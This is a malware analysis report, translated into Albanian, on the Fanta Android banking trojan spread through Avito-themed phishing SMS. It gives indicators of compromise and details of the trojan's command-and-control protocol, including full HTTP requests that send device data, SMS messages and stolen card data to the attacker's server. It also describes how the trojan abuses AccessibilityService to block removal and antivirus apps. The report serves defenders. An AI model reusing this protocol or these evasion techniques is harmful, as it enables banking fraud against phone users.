Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android

Një herë do të dëshironi të shisni diçka në Avito dhe, pasi të publikoni një përshkrim të detajuar të produktit tuaj (për shembull, moduli i memorjes RAM), do të merrni një mesazh të tillë:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër AndroidDuke hapur linkun, do të shihni një faqe që duket mjaft e pafajshme, duke ju njoftuar, juve shitësin e lumtur dhe të suksesshëm, për kryerjen e një blerjeje:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
Pasi të keni klikuar butonin 'Vazhdo', një skedar APK me ikonë dhe emër që ngjall besim do të shkarkohet në pajisjen tuaj Android. Keni instaluar një aplikacion që për arsye të panjohura kërkon leje për AccessibilityService, pastaj shfaqen dhe shuhen shpejt disa dritare dhe... gjithçka.

Ju hyni për të kontrolluar bilancin tuaj, por aplikacioni juaj bankar dukej se përsëri kërkonte të dhënat e kartës tuaj. Pas futjes së të dhënave, ndodhi e keqja: për një arsye që ende nuk e kuptoni, paratë fillojnë të zhduken nga llogaria juaj. Përpiqeni të zgjidhni problemin, por telefoni juaj bëhet në ngritje: vetë klikon butonat 'Në prapavijë' dhe 'Në shtëpi', nuk fiket dhe nuk lejon aktivizimin e asnjë mbrojtjeje. Në përfundim, mbeteni pa para, produkti juaj nuk është blerë, jeni në ngatërrim dhe pyesni veten: çfarë ndodhi?

Përgjigjja është e thjeshtë: ju jeni viktimë e trojanit Fanta në Android, nga familja Flexnet. Si ndodhi kjo? Tani do ta shpjegojmë.

Shkruar nga: Andrey Polovinkin, specialist i ri në analizën e malware-it, Ivan Pisarëv, specialist në analizën e malware-it.

Disa statistika

PĂ«r herĂ« tĂ« parĂ«, pĂ«r familjen e trojanĂ«ve Android Flexnet u bĂ« e njohur qĂ« nĂ« vitin 2015. GjatĂ« kĂ«saj periudhe tĂ« gjatĂ« aktiviteti, kjo familje Ă«shtĂ« zgjeruar nĂ« disa nĂ«nfamilje: Fanta, Limebot, Lipton etj. TrojanĂ«t, ashtu si infrastruktura e tyre lidhur, nuk janĂ« duke qĂ«ndruar nĂ« vend: po zhvillohen skema tĂ« reja efektive shpĂ«rndarjeje — nĂ« rastin tonĂ« faqe phishing cilĂ«sore, tĂ« targetuara pĂ«r pĂ«rdoruesin-shitĂ«s, dhe zhvilluesit e trojanĂ«ve po ndjekin trendet moderne nĂ« krijimin e viruseve — duke shtuar funksionalitete tĂ« reja qĂ« lejojnĂ« vjedhjen mĂ« tĂ« efektshme tĂ« parave nga pajisjet e infektuara dhe kalimin e mekanizmave tĂ« mbrojtjes.

Kampanja e përshkruar në këtë artikull është e orientuar drejt përdoruesve nga Rusia, me një numër të vogël të pajisjeve të infektuara të regjistruar në Ukrainë, madje edhe më pak në Kazakistan dhe Bjellorusi.

PavarĂ«sisht se Flexnet ka qenĂ« nĂ« arenĂ«n e trojanĂ«ve pĂ«r Android pĂ«r mĂ« shumĂ« se 4 vjet dhe Ă«shtĂ« studiuar nĂ« detaje nga shumĂ« kĂ«rkues, ai ende Ă«shtĂ« nĂ« formĂ« tĂ« shkĂ«lqyer. QĂ« nga janari i vitit 2019, shuma e potenciale e dĂ«mit arrin mbi 35 milion rubla — dhe kjo Ă«shtĂ« vetĂ«m pĂ«r fushatat nĂ« Rusi. NĂ« vitin 2015, versione tĂ« ndryshme tĂ« kĂ«tij trojani Android janĂ« shitur nĂ« forume underground, aty ishte e mundur tĂ« gjeje gjithashtu kodin burimor tĂ« trojanit me njĂ« pĂ«rshkrim tĂ« detajuar. Kjo do tĂ« thotĂ« se statistikat e dĂ«mit nĂ« mbarĂ« botĂ«n janĂ« edhe mĂ« mbresĂ«lĂ«nĂ«se. NjĂ« tregues i mirĂ« pĂ«r njĂ« tĂ« moshuar tĂ« tillĂ«, apo jo?

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android

Nga shitja deri te tradhtia

Sipas screenshots tĂ« paraqitura mĂ« parĂ« tĂ« faqes sĂ« phishing pĂ«r shĂ«rbimin e internetit pĂ«r shpallje Avito, ajo Ă«shtĂ« pĂ«rgatitur pĂ«r njĂ« viktimĂ« tĂ« caktuar. Duket se kriminelĂ«t po pĂ«rdorin njĂ« nga parserat e Avito, qĂ« nxjerr numrin e telefonit dhe emrin e shitĂ«sit, si dhe pĂ«rshkrimin e produktit. Pas hapjes sĂ« faqes dhe pĂ«rgatitjes sĂ« skedarit APK, viktimĂ«s i dĂ«rgohet njĂ« mesazh SMS me emrin e saj dhe njĂ« lidhje drejt faqes sĂ« phishing, qĂ« pĂ«rmban pĂ«rshkrimin e produktit tĂ« saj dhe shumĂ«n e marrĂ« nga "shkĂ«mbimi" i produktit. Duke klikuar nĂ« butonin, pĂ«rdoruesi merr njĂ« skedar APK tĂ« dĂ«mshĂ«m — Fanta.

Kërkimi i domainit shcet491[.]ru tregoi se ai është deleguar në serverët DNS të kompanisë Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Skedari i zonës së domainit përmban shënime që tregojnë për adresat IP 31.220.23[.]236, 31.220.23[.]243 dhe 31.220.23[.]235. Megjithatë, shënimi kryesor i burimit të domainit (A-record) tregon për serverin me IP adresën 178.132.1[.]240.

IP adresa 178.132.1[.]240 është e vendosur në Holandë dhe i takon hostit WorldStream. Adresat IP 31.220.23[.]235, 31.220.23[.]236 dhe 31.220.23[.]243 janë të vendosura në Mbretërinë e Bashkuar dhe i takojnë serverit virtual të hostimit HOSTINGER. Si regjistrues përdoret openprov-ru. Në IP adresin 178.132.1[.]240 janë rezoluar gjithashtu domenet:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Duhet të theksohet se nga të gjitha domenet ishin të arritshme lidhje të formatit të mëposhtëm:

http://(www.){0,1}/[0-9]{7}

Ky model përfshin gjithashtu lidhje nga mesazhet SMS. Sipas të dhënave historike, është zbuluar se një domeni i përket disa lidhjeve sipas modelit të përshkruar më sipër, që tregon për përdorimin e një domeni për shpërndarjen e trojanëve ndaj disa viktimave.

TĂ« kalojmĂ« pak pĂ«rpara: si server menaxhues, trojani i ngarkuar nga lidhja SMS pĂ«rdor adresĂ«n onuseseddohap[.]club. Ky domen u regjistrua mĂ« 2019-03-12, dhe qĂ« nga 2019-04-29 ka pasur ndĂ«rveprime tĂ« aplikacioneve APK me kĂ«tĂ« domen. NĂ« pĂ«rputhje me tĂ« dhĂ«nat e marra nga VirusTotal, gjithsej 109 aplikacione kanĂ« ndĂ«rvepruar me kĂ«tĂ« server. Domeni vetĂ« u rezolua nĂ« IP adresin 217.23.14[.]27, i lokalizuar nĂ« HolandĂ« dhe i pĂ«rket hostuesit WorldStream. Si regjistrues pĂ«rdoret namecheap. NĂ« kĂ«tĂ« IP adresĂ« janĂ« rezoluar gjithashtu domenet bad-racoon[.]club ($start ßi mĂ« 2018-09-25) dhe bad-racoon[.]live (du 25-10-2018). Me domenin bad-racoon[.]club Ă«shtĂ« ndĂ«rvepruar me mĂ« shumĂ« se 80 skedarĂ« APK, me bad-racoon[.]live — mĂ« shumĂ« se 100.

Në përgjithësi, mënyra e sulmit duket kështu:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android

ÇfarĂ« ka Fanta nĂ«n kapak?

Si shumë trojanë të tjerë për Android, Fanta është në gjendje të lexojë dhe dërgojë mesazhe SMS, të kryejë kërkesa USSD, të tregojë ekranet e veta mbi aplikacione (përfshirë ato bankare). Megjithatë, në arsenalin e funksionaliteteve të këtij familjeje është shtuar: Fanta ka filluar të përdorë AccessibilityService për qëllime të ndryshme: leximin e përmbajtjes së njoftimeve të aplikacioneve të tjera, parandalimin e zbarkimit dhe ndalimin e ekzekutimit të trojanit në pajisjen e infektuar, etj. Fanta punon në të gjitha versionet e Android nga 4.4 e lart. Në këtë artikull, ne do të shqyrtojmë më në detaje mostrën e ardhshme të Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Menjëherë pas fillimit

Menjëherë pas fillimit, trojani fshihet ikona e tij. Përdorimi i aplikacionit është i mundur vetëm nëse emri i pajisjes së infektuar nuk ndodhet në listën:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

Kjo kontroll bĂ«het nĂ« shĂ«rbimin kryesor tĂ« trojanit — MainService. NĂ« fillim, ndodhi inicializimi i parametrave tĂ« konfigurimit tĂ« aplikacionit me vlerat default (pĂ«r formatin e ruajtjes sĂ« tĂ« dhĂ«nave tĂ« konfigurimit dhe kuptimin e tyre do tĂ« flitet mĂ« vonĂ«), si dhe regjistrimi i njĂ« pajisjeje tĂ« re tĂ« infektuar nĂ« serverin menaxhues. NĂ« server do tĂ« dĂ«rgohet njĂ« kĂ«rkesĂ« HTTP POST me tipin e mesazhit register_bot dhe informacionin mbi pajisjen e infektuar (versioni Android, IMEI, numri i telefonit, emri i operatorit dhe kodi i vendit ku Ă«shtĂ« regjistruar operatori). Si server menaxhues shĂ«rben adresa hXXp://onuseseddohap[.]club/controller.php. NĂ« pĂ«rgjigje, serveri dĂ«rgon njĂ« mesazh qĂ« pĂ«rmban fushat bot_id, bot_pwd, server — kĂ«to vlera aplikacioni i ruan si parametra tĂ« serverit CnC. Parametri server Ă«shtĂ« opsional, nĂ«se fusha nuk u mor: Fanta pĂ«rdor adresĂ«n e regjistrimit — hXXp://onuseseddohap[.]club/controller.php. Funkcioni i ndryshimit tĂ« adresĂ«s CnC mund tĂ« aplikohet pĂ«r tĂ« zgjidhur dy probleme: shpĂ«rndarja e barabartĂ« e ngarkesĂ«s midis disa serverĂ«ve (nĂ« rast tĂ« numrit tĂ« madh tĂ« pajisjeve tĂ« infektuara, ngarkesa nĂ« njĂ« server web tĂ« paoptimizuar mund tĂ« jetĂ« e lartĂ«), si dhe pĂ«r tĂ« pĂ«rdorur njĂ« server alternativ nĂ« rast tĂ« dĂ«shtimit tĂ« njĂ«rit nga serverĂ«t CnC.

Nëse ndodhi një gabim gjatë dërgimit të kërkesës, trojani do të përsërisë procesin e regjistrimit pas 20 sekondash.

Pas regjistrimit të suksesshëm të pajisjes, Fanta do të tregojë përdoruesit mesazhin në vijim:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
ShĂ«nim i rĂ«ndĂ«sishĂ«m: shĂ«rbimi me emrin Siguria e sistemit — emri i shĂ«rbimit tĂ« trojanit, dhe pas klikimit nĂ« butonin OK do tĂ« hapet njĂ« dritare me cilĂ«simet e Accessibility tĂ« pajisjes sĂ« infektuar, ku pĂ«rdoruesi duhet tĂ« japĂ« vetĂ« tĂ« drejtat e Accessibility pĂ«r shĂ«rbimin e dĂ«mshĂ«m:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
Sapo përdoruesi aktivizon AccessibilityService, Fanta merr akses në përmbajtjen e dritareve të aplikacioneve dhe veprimet që kryhen në to:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
Menjëherë pas marrjes së të drejtave të Accessibility, trojani kërkon të drejtat e administratorit dhe të drejtat për leximin e njoftimeve:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
Me ndihmën e AccessibilityService, aplikacioni imiton shtypjet e çelësave, duke fituar kështu të gjitha të drejtat e nevojshme.

Fanta krijon disa ekzemplarë të bazave të të dhënave (të cilat do të përshkruhen më vonë), të nevojshme për ruajtjen e të dhënave të konfigurimit, si dhe informacionit të mbledhur në procesin e infektimit të pajisjes. Për të dërguar informacionin e mbledhur, trojani krijon një detyrë të përsëritur, e cila është e dizajnuar për të shkarkuar fushat nga baza e të dhënave dhe për të marrë komandat nga serveri menaxhues. Intervali për të kontaktuar CnC përcaktohet në varësi të versionit të Android: në rastin e 5.1, intervali do të jetë 10 sekonda, në të kundërt 60 sekonda.

Për të marrë një komandë, Fanta bën një kërkesë GetTask në serverin menaxhues. Në përgjigje, CnC mund të dërgojë një nga komandat e mëposhtme:

EkipaPërshkrimi
0Dërgo SMS
1Kryej telefonatë ose komandë USSD
2Përditëso parametrin interval
3Përditëso parametrin intercept
6Përditëso parametrin smsManager
9Filloni mbledhjen e SMS-ve
11Rivendosni telefonin në cilësimet fabrika
12Aktivizimi/Çaktivizimi i regjistrimit tĂ« krijimit tĂ« dritareve

Fanta gjithashtu mbledh njoftime nga 70 aplikacione bankar, sisteme pagesash të shpejta dhe portofol elektronike dhe i ruan ato në një bazë të dhënash.

Ruajtja e parametrave të konfigurimit

PĂ«r ruajtjen e parametrave tĂ« konfigurimit, Fanta pĂ«rdor njĂ« qasje standarde pĂ«r platformĂ«n Android — Preferences-fajllat. CilĂ«simet do tĂ« ruhen nĂ« njĂ« fajll me emrin settings. PĂ«rshkrimi i parametrave tĂ« ruajtur ndodhet nĂ« tabelĂ«n mĂ« poshtĂ«.

EmriVlera e paracaktuarVlerat e mundshmePërshkrimi
id0IntegerIdentifikuesi i botit
serverhXXp://onuseseddohap[.]club/URLAdresa e serverit të menaxhimit
pwd—StringFjalĂ«kalimi pĂ«r serverin
interval20IntegerIntervali kohor. Tregon sa duhet të vonohet ekzekutimi i detyrave të mëtejshme:
  • Kur dĂ«rgohet njĂ« kĂ«rkesĂ« pĂ«r statusin e SMS tĂ« dĂ«rguar
  • Marrja e njĂ« urdhri tĂ« ri nga serveri i menaxhimit

interceptallall/telNumberNĂ«se fusha barazohet me stringun all ose telNumber, atĂ«herĂ« SMS-i i marrĂ« do tĂ« kapet nga aplikacioni dhe nuk do t’i shfaqet pĂ«rdoruesit
smsManager00/1Aktivizimi/çaktivizimi i aplikacionit si marrës i SMS-ve të paracaktuar
readDialogfalseTrue/falseAktivizimi/çaktivizimi i regjistrimit të ngjarjeve AccessibilityEvent

Gjithashtu, Fanta përdor fajllin smsManager:

EmriVlera e paracaktuarVlerat e mundshmePërshkrimi
pckg—StringEmri i menaxherit tĂ« SMS-ve tĂ« pĂ«rdorur

Ndërveprimi me bazat e të dhënave

Gjatë punës së tij, trojani përdor dy baza të dhënash. Baza e të dhënave me emrin a përdoret për ruajtjen e informacionit të ndryshëm të mbledhur nga telefoni. Baza e dytë e të dhënave quhet fanta.db dhe përdoret për ruajtjen e konfigurimeve që kanë të bëjnë me krijimin e dritareve të phishing-ut, të destinuara për të mbledhur informacion mbi kartat bankare.

Trojan përdor bazën e të dhënave a për ruajtjen e informacionit të mbledhur dhe për regjistrimin e veprimeve të tij. Të dhënat ruhen në tabelën logs. Për krijimin e tabelës përdoret kërkesa SQL e mëposhtme:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Në bazën e të dhënave ndodhet informacioni i mëposhtëm:

1. Regjistrimi i aktivizimit të pajisjes së infektuar me mesazhin Telefoni u ndez!

2. Njoftimet nga aplikacionet. Mesazhi formohet sipas këtij shablli:

():

3. Të dhënat e kartave bankare nga format e phishing-ut të krijuara nga trojani. Parametri VIEW_NAME mund të jetë një nga listat:

  • AliExpress
  • Avito
  • Google Play
  • TjetĂ«r

Mesazhi regjistrohet në formatin:

[]() Numri i kartës:; Data:/%; CVV:

4. Mesazhet SMS hyrëse/dalëse në format:

([] Lloji: Hyrëse/Dalëse) :

5. Informacion mbi paketën që krijon dritaren në format:

()

Shembulli i tabelës logs:

Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
Një nga funksionalitetet e Fanta është grumbullimi i informacionit mbi kartat bankare. Grumbullimi i të dhënave ndodh përmes krijimit të dritareve të pescaçta kur hapen aplikacionet bankare. Trojani krijon një dritare peskaçte vetëm një herë. Informacioni se dritarja është shfaqur për përdoruesin ruhet në tabelë settings në bazën e të dhënave fanta.db. Për krijimin e bazës së të dhënave përdoret kërkesa SQL si vijon:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Të gjitha fushat e tabelës settings në mënyrë default inicializohen me vlerën 1 (krijoni dritaren e pescaçte). Pasi përdoruesi të ketë futur të dhënat e tij, vlera do të vendoset në 0. Shembulli i fushave të tabelës settings:

  • can_login — fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit kur hapet aplikacioni bankar
  • first_bank — nuk nuk pĂ«rdoret
  • can_avito — fusha tregon formĂ«n gjatĂ« hapjes sĂ« aplikacionit Avito
  • can_ali — fusha tregon formĂ«n gjatĂ« hapjes sĂ« aplikacionit Aliexpress
  • can_another — fusha tregon formĂ«n gjatĂ« hapjes sĂ« çdo aplikacioni nga lista: Yula, Pandao, Drom Auto, Portofoli. Kartat e zbritjes dhe bonuseve, Aviasales, Booking, Trivago
  • can_card — fusha tregon formĂ«n gjatĂ« hapjes Google Play

Bashkëpunimi me serverin menaxhues

Bashkëpunimi në rrjet me serverin menaxhues ndodh përmes protokollit HTTP. Për të punuar me rrjetin, Fanta përdor bibliotekën e njohur Retrofit. Kërkesat dërgohen në adresën hXXp://onuseseddohap[.]club/controller.php. Adresa e serverit mund të ndryshohet gjatë regjistrimit në server. Nga serveri mund të vijnë cookie. Fanta bën këto kërkesa në server:

  • Regjistrimi i robotit nĂ« serverin menaxhues ndodh njĂ« herĂ« gjatĂ« nisjes sĂ« parĂ«. NĂ« server dĂ«rgohen tĂ« dhĂ«nat e mĂ«poshtme pĂ«r pajisjen e infektuar:
    · Cookie — cookie tĂ« marra nga serveri (vlera e parazgjedhur — varg i zbrazĂ«t)
    · mode — konstantĂ« string register_bot
    · prefix — konstantĂ« numerike 2
    · version_sdk — formohet sipas kĂ«tij modeli: /(Avit)
    · imei — IMEI i pajisjes sĂ« infektuar
    · country — kodi i vendit, ku Ă«shtĂ« regjistruar operatori, nĂ« formatin ISO
    · numri — numri i telefonit
    · operatori — emri i operatorit

    Shembulli i kërkesës që dërgohet në server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    Në përgjigje të kërkesës, serveri duhet të kthejë një objekt JSON që përmban parametrat e mëposhtëm:
    · bot_id — identifikuesi i pajisjes sĂ« infektuar. NĂ«se bot_id Ă«shtĂ« 0, Fanta do tĂ« ekzekutojĂ« pĂ«rsĂ«ri kĂ«rkesĂ«n.
    · bot_pwd — password pĂ«r serverin.
    · server — adresa e serverit menaxhues. ParametĂ«r i opsional. NĂ« rast se parametri nuk tregohet, do tĂ« pĂ«rdoret adresa e ruajtur nĂ« aplikacion.

    Shembulli i objektit JSON:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • KĂ«rkesa pĂ«r tĂ« marrĂ« komandĂ«n nga serveri. NĂ« server dĂ«rgohen tĂ« dhĂ«nat e mĂ«poshtme:
    · Cookie — cookie tĂ« marra nga serveri
    · bid — id e pajisjes sĂ« infektuar, e cila Ă«shtĂ« marrĂ« gjatĂ« dĂ«rgimit tĂ« kĂ«rkesĂ«s register_bot
    · pwd — password pĂ«r serverin
    · divice_admin — fusha pĂ«rcakton nĂ«se janĂ« marrĂ« tĂ« drejtat administratore. NĂ«se janĂ« marrĂ« tĂ« drejtat administratore, fusha Ă«shtĂ« e barabartĂ« me 1, pĂ«rndryshe 0
    · AksesueshmĂ«ria — statusi i funksionimit tĂ« ShĂ«rbimit tĂ« AksesueshmĂ«risĂ«. NĂ«se shĂ«rbimi Ă«shtĂ« nisur, vlera Ă«shtĂ« e barabartĂ« me 1, pĂ«rndryshe 0
    · Menaxheri i SMS — tregon nĂ«se trojani Ă«shtĂ« aktiv si aplikacioni i paracaktuar pĂ«r marrjen e SMS-ve
    · ekrani — tregon nĂ« cilin gjendje ndodhet ekrani. Vlera do tĂ« caktohet 1, nĂ«se ekrani Ă«shtĂ« i ndezur, pĂ«rndryshe 0;

    Shembulli i kërkesës që dërgohet në server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<V_ADM%>&Accessibility=<CSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Në varësi të komandës, serveri mund të kthejë një objekt JSON me parametra të ndryshëm:

    · Ekipa Dërgo SMS: Në parametra përfshihet numri i telefonit, teksti i SMS-së dhe identifikuesi i mesazhit të dërguar. Identifikuesi përdoret kur dërgohet një mesazh në server me tipin setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Kryej telefonatë ose komandë USSD: Numri i telefonit ose komanda vjen në trupin e përgjigjes.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho parametrin interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": 
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho parametrin intercept.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho fushën SmsManager.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Kryej mbledhjen e mesazheve SMS nga pajisja e infektuar.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Rivendosni telefonin në cilësimet fabrika:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho parametrin ReadDialog.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • DĂ«rgimi i mesazhit me tipin setSmsStatus. Kjo kĂ«rkesĂ« bĂ«het pas ekzekutimit tĂ« komandĂ«s DĂ«rgo SMS. KĂ«rkesa duket si mĂ« poshtĂ«:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus& id=& status_sms=

  • DĂ«rgimi i pĂ«rmbajtjes sĂ« bazĂ«s sĂ« tĂ« dhĂ«nave. NĂ« njĂ« kĂ«rkesĂ« dĂ«rgohet njĂ« rresht. TĂ« dhĂ«nat e mĂ«poshtme dĂ«rgohen nĂ« server:
    · Cookie — cookie tĂ« marra nga serveri
    · mode — konstantĂ« string setSaveInboxSms
    · bid — id e pajisjes sĂ« infektuar, e cila Ă«shtĂ« marrĂ« gjatĂ« dĂ«rgimit tĂ« kĂ«rkesĂ«s register_bot
    · text — pĂ«rmbajtja nĂ« regjistrin aktual tĂ« DB (fusha d nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
    · numri — emri i regjistrit aktual tĂ« DB (fusha p nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
    · sms_mode — vlera numerike (fusha m nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)

    Kërkesa duket si më poshtë:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Pas një dërgimi të suksesshëm në server, rreshti do të hiqet nga tabela. Shembuj i objektit JSON që kthehet nga serveri:

    {
        "response":[],
        "status":"ok"
    }

Ndërveprimi me AccessibilityService

AccessibilityService është implementuar për të lehtësuar përdorimin e pajisjeve Android nga njerëzit me aftësi të kufizuara. Në shumicën e rasteve, ndërveprimi me aplikacionin kërkon ndërveprim fizik. AccessibilityService lejon që ato të realizohen në mënyrë programore. Fanta përdor këtë shërbim për të krijuar dritare të rreme në aplikacionet bankare dhe për të penguar hapjen e cilësimeve të sistemit dhe disa aplikacioneve.

Duke pĂ«rdorur funksionalitetet e AccessibilityService, trojani ndjek ndryshimet e elementeve nĂ« ekranin e pajisjes sĂ« infektuar. Siç Ă«shtĂ« pĂ«rmendur mĂ« parĂ«, nĂ« cilĂ«simet e Fanta ka njĂ« parametrin qĂ« merret me regjistrimin e operacioneve me dritaret — readDialog. NĂ«se ky parametr Ă«shtĂ« i vendosur, do tĂ« shtohet informacion nĂ« bazĂ«n e tĂ« dhĂ«nave mbi emrin dhe pĂ«rshkrimin e paketĂ«s qĂ« iniciativ eventin. TrojanĂ«t kryejnĂ« veprimet nĂ« vijim kur ndodhin ngjarje:

  • Imiton shtypjen e butonave prapa dhe nĂ« shtĂ«pi nĂ« rastin e:
    · nëse përdoruesi dëshiron të rinisë pajisjen e tij
    · nĂ«se pĂ«rdoruesi dĂ«shiron tĂ« fshijĂ« aplikacionin “Avito” ose tĂ« ndryshojĂ« tĂ« drejtat e aksesit
    · nĂ«se nĂ« faqen ka pĂ«rmendje tĂ« aplikacionit “Avito”
    · kur hapet aplikacioni “Google Play Mbrojtja”
    · kur hapen faqet me cilësimet e AccessibilityService
    · kur ndodh njĂ« dritare dialogu “Siguria e sistemit”
    · kur hapet faqja me cilĂ«simet “Draw over other app”
    · kur hapen faqet “Aplikacionet”, “Restauration dhe rikuperim”, “Rikthim tĂ« dhĂ«nash”, “Rivendosja e cilĂ«simeve”, “Paneli i zhvilluesve”, “ShĂ«rbimet speciale”, “Veçori tĂ« veçanta”, “TĂ« drejtat speciale”
    · nëse ngjarja është gjeneruar nga aplikacione të caktuara.

    Lista e aplikacioneve

    • android
    • Master Lite
    • Clean Master
    • Clean Master pĂ«r CPU x86
    • Menaxhimi i lejeve tĂ« aplikacionit Meizu
    • MIUI Siguria
    • Clean Master — Antivirus & Pastrimi i caches dhe plehrave
    • Kontrolli prindĂ«ror dhe GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Siguria nĂ« rrjet Beta
    • Pastrimi i Virusit, Antivirus, Pastrues (MAX Siguria)
    • Mobile AntiVirus Siguria PRO
    • Avast antivirus & gratis mbrojtja 2019
    • Mobile Security ĐœĐ”ĐłĐ°Đ€ĐŸĐœ
    • AVG Mbrojtja pĂ«r Xperia
    • Siguria Mobile
    • Malwarebytes antivirus & mbrojtja
    • Antivirus pĂ«r Android 2019
    • Security Master — Antivirus, VPN, AppLock, Booster
    • AVG antivirus pĂ«r tabletin Huawei Menaxheri i Sistem
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Siguria Mobile
    • Kaspersky Internet Security: Antivirus dhe Mbrojtja
    • Kaspersky Battery Life: Ruaj & Booster
    • Kaspersky Endpoint Security — mbrojtja dhe menaxhimi
    • AVG Antivirus falas 2019 – Mbrojtja pĂ«r Android
    • Antivirus Android
    • Norton Mobile Security dhe Antivirus
    • Antivirus, firewall, VPN, siguria mobile
    • Mobile Security: antivirus, VPN, mbrojtje nga vjedhja
    • Antivirus pĂ«r Android

  • NĂ«se kĂ«rkohet leja gjatĂ« dĂ«rgimit tĂ« mesazhit SMS nĂ« njĂ« numĂ«r tĂ« shkurtĂ«r, Fanta imiton prekjen e checkbox Kujto zgjedhjen dhe butonin dĂ«rgo.
  • Kur pĂ«rpiqet tĂ« marr pĂ«rsipĂ«r tĂ« drejtat e administratorit nga trojani, bllokon ekranin e telefonit.
  • Parandalon shtimin e administratorĂ«ve tĂ« rinj.
  • NĂ«se aplikacioni antivirus dr.web ka zbuluar kĂ«rcĂ«nim, Fanta imiton prekjen e butonit injoro.
  • Trojan imiton butonat e kthej nĂ« prapaskenĂ« dhe nĂ« shtĂ«pi, nĂ«se ngjarja u krijua nga aplikacioni Samsung Device Care.
  • Fanta krijon dritare phishing me forma pĂ«r tĂ« futur informacionin mbi kartat bankare, nĂ«se Ă«shtĂ« nisur njĂ« aplikacion nga lista qĂ« pĂ«rfshin rreth 30 shĂ«rbime tĂ« ndryshme nĂ« internet. NdĂ«r to: AliExpress, Booking, Avito, Komponenti Google Play Market, Pandao, Drom Auto etj.

    Format phishing

    Fanta analizon cilat aplikacione hapen në pajisjen e infektuar. Nëse hapet një aplikacion i interesit, trojani tregon një dritare phishing mbi të gjitha të tjera, e cila përbën një formë për të futur informacionin e kartës bankare. Përdoruesi duhet të fusë të dhënat e mëposhtme:

    • Numri i kartĂ«s
    • Data e skadencĂ«s sĂ« kartĂ«s
    • CVV
    • Emri i mbajtĂ«sit tĂ« kartĂ«s (nuk Ă«shtĂ« pĂ«r tĂ« gjitha bankat)

